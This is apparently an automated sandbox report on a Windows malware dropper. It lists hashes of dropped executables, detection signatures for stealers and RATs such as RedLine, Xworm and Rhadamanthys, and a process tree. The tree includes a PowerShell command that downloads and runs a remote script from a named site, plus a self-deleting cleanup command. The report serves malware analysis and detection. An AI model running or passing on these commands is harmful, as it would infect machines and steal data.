| SHA1 | 0760f68b204c5427329fe744324143c07589a637 |
| SHA256 | 612569c97b627926d49741c52805e7aebfb26a5841841e31e96ed946737ad97c |
| SHA512 | 5f1705e0c29e102c367c88eab9f8794ac19928550cdedf543e1622a3162ad8d4ab0f747fe87d191d6b89d228f0689ff2a5f3fc78179b298c7e6e9dc59db063f4 |
C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
| MD5 | 614a613062f4be5d75936376c4da25ce |
| SHA1 | e08ba1171b9c9674dd0e3c1c029814f79e2084fe |
| SHA256 | ceb94d484f0241432751619082e07acae723e9d0391737c64abaa511210f5b85 |
| SHA512 | a44091d1cd658de716b33d662f503d573a28c6009dbaa99c3e6ff32b51dd7faa6104b1bb9fdb104b69e2c5d0faa1d0603304c43149132af200e49aa20662428c |
\Users\Admin\AppData\Local\Temp\Files\ma.exe
| MD5 | b575af7fc655998dc587120ad88d63c1 |
| SHA1 | bcb2f4cd757fed4b54f2bf2e7789d55224125166 |
| SHA256 | 07c01956bf49d65a52340c6ace05640f821b02aa99fec60718ca3771d0d17f23 |
| SHA512 | 7fe6e9a05bb6cd47b38f1bf7b6ec1379390c6b27c0df556abee01f221e894619e3e96005b310f106727e76aa4d708ba44dc852a5a9756b94c942c65415f21bae |
C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
| MD5 | 094259a23ce6480a13acaf952dfb0aac |
| SHA1 | f30c211defb833059c52bd6eb0fe5f6e6b1603b9 |
| SHA256 | bfd365d0b832d1d626ea58dd81b81d5cebfd54558a8f3d09af55ceccb65db958 |
| SHA512 | 3a395f25b31a0aba2ca12da2289e22e171780215d5dca772328fa6deb1e5133ed8d734494db5d89aef8343cbd76c8b6e3a6713f4bc85e76e37eab668247edd96 |
C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
| MD5 | f4e4a02f1ae6de1e4f8a57b527c61f13 |
| SHA1 | 1cf3e2d18942666b1cd09bb4a1d6ec27b0e5a548 |
| SHA256 | 2fac8922a1bb2cbe38b4229e91030345fc32e1c12e0acb6929bf974aebf1806e |
| SHA512 | 09f0bb8ca8a80404baa1551eb3d1c880dc91d52cadb71776d83ccfe2625a96b6fc553af96dc275147400c121465d621379171c4289eb0351e103bae4ba389743 |
memory/968-1182-0x0000000000CE0000-0x00000000011E4000-memory.dmp
\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
| MD5 | 43d34d37347f89db406fbeffafda3bdd |
| SHA1 | 7d66931d9d5352b7f92f6980c56d7db41479e7ae |
| SHA256 | 1a6a24485c916b539f005a9e065ef2237d75c5cb68ef6a7585b736ad8a0f4186 |
| SHA512 | b42e9f3bf427411e3b69bd6f87d4df2a51ddb2825f20d43684e59e75b891de832ec798f6ebb2fd7147097373e6bbf5d1b93a953863a4f121bf27502de8048123 |
memory/1844-1195-0x0000000000DE0000-0x0000000001008000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
| MD5 | 19e73cd873f860b987a6249288f44329 |
| SHA1 | 659796443ef3e795217fafd93fd75489006aa83d |
| SHA256 | 69df5707d1b59b221423fcb8198a9ef23501c38cf58702c15ad82f2b37b21288 |
| SHA512 | 9d6a20ba297cd6f16901fd357caa8a700b11e30a1f2c52cc2b4408f4d0401115c6cc151ef829f8391d48a83b590ec8a74c3355bd62be351659fd674c38653eb5 |
C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
| MD5 | 952a2f58b6c7bf4133585b3159dd956c |
| SHA1 | c4720bb5deec9be7af4ae0234c5bb839c50245bc |
| SHA256 | 64a2d784b916df990f963ccd9a66c25e16d38de106dfa9e80ab6375f9aaaa6ae |
| SHA512 | 3741318fc73f17bb45b6a0272984f20b9c195a06863eb85d736ffa088da3757477e647a18ae1066af015dac5ebf792521a6de4ea56d69c8b4d203d1c06b64221 |
C:\Users\Admin\AppData\Local\Temp\tmp780D.tmp.bat
| MD5 | 149ee945fc75ef5de3661af29886ecbd |
| SHA1 | 83701dd9aad6b441fbf517d5ae67c09f35e6ab6e |
| SHA256 | 25cdc5161800589680cc023ec706054d6a611c41941577489f922af7bfa548e6 |
| SHA512 | 009491fa89ca69734b6256ee1e79076a43cf45ed69dfe2d5cd9e1fcb6999fde441a3ecf2e061a8beaefbd390328f923f6dc2918f7718d97eeb275f4e8f69b919 |
\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
| MD5 | 007843e3b274bc3c8474656a6aa68590 |
| SHA1 | e20c378c3e1a96716c7e28035e9a4a75f59ec8e0 |
| SHA256 | 6d74fc4c7ac833eb6d2eafd9bcf2d1f2fd12ef2217576cee928c76cb0e5cf4b1 |
| SHA512 | 3d41164ed48464fe768220ba9db3b958aad97a5e03b31756ae26d22b2de5702a2d047aa78918b2815e3b49a214ec5824cc663950b2b524bd925260eb14273cdf |
memory/968-1278-0x000007FEF5CE0000-0x000007FEF66CC000-memory.dmp
memory/2268-1280-0x0000000000A40000-0x0000000000F44000-memory.dmp
memory/1796-1281-0x000007FEF5CE0000-0x000007FEF66CC000-memory.dmp
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
| MD5 | 8d6760fc8e845e527a9770536d4dbd3f |
| SHA1 | 6ff47f3f28fe7bf60981cab063379884b17fd2ae |
| SHA256 | c3558b9289e338439936da9c6810bffa1502fccf828abee3241622982eaeca1f |
| SHA512 | 03c11e4863bcc79cf6c7d489d697c2539cba369bdb377049c85d3e50c9e2a9dfd0ec507ff95e3331cd219667e4ac3801bd56d1e6d1202fe8e1d9cc6be8e54291 |
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
| MD5 | bb398fe88da91528938380fcb90e4564 |
| SHA1 | 5b667cbb8ab54cc004263ec8ebac60b0f8484480 |
| SHA256 | 10a3aac04353f6f2096f02052aa5105b4474f13896a7718fa8c001b059a4f2b9 |
| SHA512 | ae760146741ae11a27865abd17feb1423ddce89bd0e034c697060965986b70c498b245ac670816599da885d101006e70d94d2d003d1e641cad207e83f5f7e54a |
C:\Users\Admin\AppData\Local\Temp\Files\RobluxCoins.exe
| MD5 | 39d70d0ec1d2013f1dd2c30e7f22b930 |
| SHA1 | c7a37c2b36b37f64632e1dceb6468c48aa6ba9bb |
| SHA256 | 7bf52c3fa707ed3e151eece69d7985cf5c01735f5f84efb89b60b3e9bffdb79d |
| SHA512 | 1028bf447e16dbdebcd270714ea3bc6a6b1b00c1a8e1170318ecf7a2304af7983581bba80cbaf79f9cd99fd4af6c258e6d1043dc9f67219578a3158a2bd2ced8 |
memory/2536-1296-0x0000000002C50000-0x0000000002D50000-memory.dmp
memory/2536-1299-0x0000000000230000-0x0000000000260000-memory.dmp
memory/2536-1312-0x0000000000400000-0x0000000002B0D000-memory.dmp
memory/2268-1322-0x0000000000130000-0x0000000000131000-memory.dmp
memory/2268-1325-0x000007FEF5CE0000-0x000007FEF66CC000-memory.dmp
memory/1796-1330-0x000000001BC60000-0x000000001BCE0000-memory.dmp
memory/1616-1332-0x0000000000AE0000-0x0000000000B4C000-memory.dmp
memory/2268-1319-0x000000001C0C0000-0x000000001C140000-memory.dmp
memory/1844-1316-0x0000000074B40000-0x000000007522E000-memory.dmp
\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
| MD5 | 2bc35706a7400979e245d619ac78d836 |
| SHA1 | cdd7a904f77d74e606b8cbf4d2466601a4cec72e |
| SHA256 | 4ce2762488b2f816005aafedba13b65ac7a8136ce76eba9b2f6ef86f485f187b |
| SHA512 | 551492a0c76223d30a843f5255bfcea1c07fd20b2b7242ccfcaf10de31de167e7e64faaaf686c9a450bb0d3b303ddd79bee364f426cc741f2668e0d1823c19fd |
\Users\Admin\AppData\Local\Temp\Files\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.exe
| MD5 | 72bd5990ea8d3b9fe0a9b236b5a33fc5 |
| SHA1 | 4f5ac0bf36caf9b80faf5f92cabee33762f74436 |
| SHA256 | 498e1723c1c1f3456d60147129d69689d267acb634fe8bfd9dc4d14dc725972e |
| SHA512 | 7bd0b7efda41ac9e1b17be33f25646631f3781e7252c36cda4b4e75604694c87f29af53a9e5595b898a8c76eb410e74f8cb6a441c9b3cddce27ef6b5c640b07c |
C:\Users\Admin\AppData\Local\Temp\Files\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.exe
| MD5 | 11efe9eb63cc68fbe542a76974ba5483 |
| SHA1 | 879cc1e41d3013f3f415c1de1a3dc105cf50191d |
| SHA256 | 67111974ffd115cc66b9a9cc1827c7a506b5eab035073c930eabb10baa23ae38 |
| SHA512 | 450a90206b708e0355f235adead3750e58357ad61ff21d8475b2acb82d64ae0f2a56c88d54b58d1218ecc47f763660ef819d932944c0a192cd59b42698260b02 |
C:\Users\Admin\AppData\Local\Temp\Files\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.exe
| MD5 | 4579ae493bb6bfb736357294fb50687e |
| SHA1 | b04c0185a9ada3481203256b3225d1e065ef5028 |
| SHA256 | cff3adbf7a5668aae35ae6cfd4b86777417167141f959aa4a667f45116567649 |
| SHA512 | 250b6f847a3690193d89a71086c7973daef8520fc56db82d3b0a6381d87b7c81daa4b69467dd27c72680d6a793e1528248c943ccdfc8c9f6d129d3f55f728d28 |
memory/2772-1361-0x0000000000400000-0x00000000004D8000-memory.dmp
memory/1716-1362-0x0000000004B40000-0x0000000004B80000-memory.dmp
memory/1616-1359-0x0000000000AE0000-0x0000000000B4C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
| MD5 | 5f5a148361889423093100648e9d91ae |
| SHA1 | 530f6439f3397bb78ce31d6ff7a9f8e552052c80 |
| SHA256 | 86cda17453d1105d6e78a822041e01fffed73547d257229cb517555fddcf1631 |
| SHA512 | e4d3410b97c7effe5c155cf927ddeca36ef9e9cef96d59fb7c23b45eb7c799cdbfe34c46a2d96d90212180b0713ca48836d11ec2294af32543af57b232bb293e |
memory/1716-1353-0x0000000074B40000-0x000000007522E000-memory.dmp
memory/1452-1376-0x0000000000240000-0x0000000000241000-memory.dmp
memory/1916-1382-0x0000000001130000-0x000000000169C000-memory.dmp
memory/1916-1383-0x0000000074B40000-0x000000007522E000-memory.dmp
memory/1136-1384-0x0000000074B40000-0x000000007522E000-memory.dmp
memory/1916-1385-0x0000000000FB0000-0x0000000000FF0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\fouette.ini
| MD5 | eb4da25d6c0d919bbe9ebc480cee0d05 |
| SHA1 | dfaeae9c23e9b282a82b1abb971599a5bcd51b27 |
| SHA256 | 70a4ee88b132159f110d96ad83001187c6a272f52d5c766f563b50ac1e072fe3 |
| SHA512 | 1e9972196d4bdbbc7366c1fc980014b3048d036f56afdeb39303263cc7af24217490dd9b9ca85ac11a0bf83a1c31eead3320e158e8b9ac819468023d1548cb5c |
C:\Users\Admin\AppData\Local\Temp\Carmind.ini
| MD5 | 16d2907f72ba61bcf429972b96cb4069 |
| SHA1 | 9e4b5b253fd60f5af867610a6e0861ca0e426456 |
| SHA256 | 5fe8b9c597b96a9a541903505adb7899b7ed6b444c2f7d11913e836d66711448 |
| SHA512 | fcd064fb6fcb9e4b3184348671e2f3db3c4419abc02248151bde2654e30ce840c04a7410196a55eba39885ffa44335bdc18c9849972fe18a528f35787d57679c |
memory/4376-1989-0x0000000000330000-0x0000000000558000-memory.dmp
memory/4376-1999-0x0000000074B40000-0x000000007522E000-memory.dmp
memory/2808-2058-0x0000000000400000-0x0000000000644000-memory.dmp
memory/2436-2060-0x0000000077940000-0x0000000077AE9000-memory.dmp
memory/2536-2073-0x0000000002C50000-0x0000000002D50000-memory.dmp
memory/2436-2077-0x0000000077B30000-0x0000000077C06000-memory.dmp
memory/2436-2079-0x000000006F910000-0x000000006F917000-memory.dmp
memory/2268-2081-0x000000001C0C0000-0x000000001C140000-memory.dmp
memory/1916-2095-0x0000000006DA0000-0x0000000007180000-memory.dmp
memory/2268-2101-0x000007FEF5CE0000-0x000007FEF66CC000-memory.dmp
memory/1796-2107-0x000000001BC60000-0x000000001BCE0000-memory.dmp
memory/1916-2113-0x0000000007180000-0x0000000007312000-memory.dmp
memory/4812-2120-0x0000000077940000-0x0000000077AE9000-memory.dmp
memory/2772-2119-0x0000000000400000-0x00000000004D8000-memory.dmp
memory/1452-2121-0x0000000000240000-0x0000000000241000-memory.dmp
memory/4812-2122-0x0000000077B66000-0x0000000077B67000-memory.dmp
memory/1916-2128-0x00000000005E0000-0x00000000005F0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe
| MD5 | b32fab896f5e701c1e816cd8c31c0ff5 |
| SHA1 | 475ed088fefe3ac3ccaf4c38868048fa7ed8ca8b |
| SHA256 | e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1 |
| SHA512 | 22ed1a9afc6caca896bee0c77d0dacb9c28747986566e176cdeb72b8cb3429323d73c5da795905a08941fa480e2e690d45edf8ce7efee4a77f5ba4c5442002d0 |
memory/2516-2186-0x0000000000622000-0x0000000000633000-memory.dmp
memory/2516-2187-0x0000000000220000-0x0000000000229000-memory.dmp
memory/2508-2217-0x0000000000400000-0x0000000000409000-memory.dmp
memory/4812-2243-0x0000000000400000-0x000000000042F000-memory.dmp
memory/4812-2253-0x0000000000400000-0x000000000042F000-memory.dmp
memory/4812-2254-0x0000000000400000-0x000000000042F000-memory.dmp
memory/4812-2255-0x0000000000400000-0x000000000042F000-memory.dmp
memory/4812-2260-0x0000000077B30000-0x0000000077C06000-memory.dmp
memory/4812-2261-0x0000000000400000-0x000000000042F000-memory.dmp
memory/4812-2272-0x0000000000400000-0x000000000042F000-memory.dmp
memory/4812-2273-0x0000000000400000-0x000000000042F000-memory.dmp
memory/4812-2274-0x0000000037130000-0x0000000037433000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-02-10 18:51
Reported
2024-02-10 18:54
Platform
win10v2004-20231222-en
Max time kernel
53s
Max time network
150s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2964 created 1052 | N/A | C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe | C:\Windows\system32\sihost.exe |
| PID 2964 created 1052 | N/A | C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe | C:\Windows\system32\sihost.exe |
Xworm
ZGRat
Detects Windows executables referencing non-Windows User-Agents
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables packed with Themida
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables packed with unregistered version of .NET Reactor
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\sqlcmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\sqlcmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
Executes dropped EXE
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\Files\niceeyestrain.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\Files\niceeyestrain.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2604 set thread context of 2964 | N/A | C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe | C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe |
| PID 3012 set thread context of 3344 | N/A | C:\Users\Admin\AppData\Local\Temp\BBLb.exe | C:\Users\Admin\AppData\Local\Temp\BBLb.exe |
| PID 2604 set thread context of 2964 | N/A | C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe | C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe |
| PID 3012 set thread context of 3344 | N/A | C:\Users\Admin\AppData\Local\Temp\BBLb.exe | C:\Users\Admin\AppData\Local\Temp\BBLb.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\MSI.CentralServer.job | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A |
| File created | C:\Windows\Tasks\MSI.CentralServer.job | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A |
Enumerates physical storage devices
Program crash
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
C:\Users\Admin\AppData\Local\Temp\Files\app1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\app1.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ss_conn_service.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ss_conn_service.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\whatgoal.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\whatgoal.exe
C:\Users\Admin\AppData\Local\Temp\Files\niceeyestrain.exe
"C:\Users\Admin\AppData\Local\Temp\Files\niceeyestrain.exe"
C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Cpp_1_3.exe
"C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Cpp_1_3.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"
C:\Users\Admin\AppData\Local\Temp\BBLb.exe
"C:\Users\Admin\AppData\Local\Temp\BBLb.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2964 -ip 2964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 448
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2964 -ip 2964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 444
C:\Users\Admin\AppData\Local\Temp\Files\osminogs.exe
"C:\Users\Admin\AppData\Local\Temp\Files\osminogs.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Amdau.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Amdau.exe"
C:\Users\Admin\AppData\Local\Temp\Files\sqlcmd.exe
"C:\Users\Admin\AppData\Local\Temp\Files\sqlcmd.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://houssagynecologue.com/assets/js/debug2.ps1')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://houssagynecologue.com/assets/js/debug2.ps1')
C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
"C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"
C:\Users\Admin\AppData\Local\Temp\BBLb.exe
C:\Users\Admin\AppData\Local\Temp\BBLb.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\Files\sqlcmd.exe" >> NUL
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe"
C:\Windows\system32\sihost.exe
sihost.exe
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
"C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
C:\Users\Admin\AppData\Local\Temp\Files\app1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\app1.exe"
C:\Users\Admin\AppData\Local\Temp\Files\teamviewer.exe
"C:\Users\Admin\AppData\Local\Temp\Files\teamviewer.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ss_conn_service.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ss_conn_service.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\whatgoal.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\whatgoal.exe
